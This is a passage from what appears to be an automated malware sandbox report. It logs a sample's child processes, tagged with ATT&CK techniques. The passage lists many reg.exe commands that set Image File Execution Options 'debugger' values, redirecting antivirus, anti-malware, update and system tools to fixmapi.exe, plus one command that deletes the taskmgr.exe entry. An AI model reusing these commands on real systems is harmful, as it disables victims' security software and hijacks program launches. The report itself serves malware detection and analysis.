    - System Location Discovery: System Language Discovery
    PID:4464
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McScript_InUse.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FrameworkService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tps.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfevtps.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3736
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myAgtSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\XTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1068
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfeann.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\consctlx.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\traycser.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TRAYICOC.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall_rules.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3152
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\escanmon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT-KB890830.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows-KB890830-x64-V5.58.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpmapp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MWASER.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MWAGENT.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrafSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GeekBuddyRSP.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\launcher_service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\unit_manager.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\unit.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chromodo_updater.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pricefountainw.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Plugin.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Desktop_Locker" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:452
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ssvchost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\z.tmp" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svncxhost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootsvchost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\esetonlinescanner_enu.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsproflt2.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McClnUI.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4800
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svhost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\stub.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msdtc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:808
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\panbss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prtest.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\surfguard.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gotopbr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spomua.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smssm.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareProtectionClient.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scrss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdsafecenter.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bbservice.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DefenderDaemon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tmPfw.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svcGenericHost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HostedAgent.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BWMeterConSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sntlkeyssrvr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:860
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spnsrvnt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sntlsrtsrvr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\snetcfg.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vprot.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2344
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ssms32.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\helper.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fud15.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fud16.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CNTAoSMgr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NTRtScan.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TMBMSRV.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PccNTMon.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pccntupd.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TmListen.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TmProxy.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdvirth.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdwtxag.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certsvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\networx.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seccenter.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windefender.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Nlas.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svehost.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iptray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1sass.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rdpthread.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\native.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCloudCleaner.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\systemx.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ClamSentinel.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svsrv.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgrr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsaoss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:748
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsasss.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wtssvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\szndesktop.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NmTaskTray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NmWebService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4428
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NmService.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUMeterSvc.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebProtectorPlus.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUMeter.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SSScheduler.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpscvs.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDShred.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\InjectWinSockServiceV3.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minergate-service.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regsvr.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jusched.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NableAVDBridge.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\soqkci.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SUPERANTISPYWARE.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscnhlp2.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SASCORE.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SASCORE64.EXE" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srcver.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\command.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xray.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\task.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winscp.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    PID:452
- - C:\Windows\SysWOW64\reg.exe
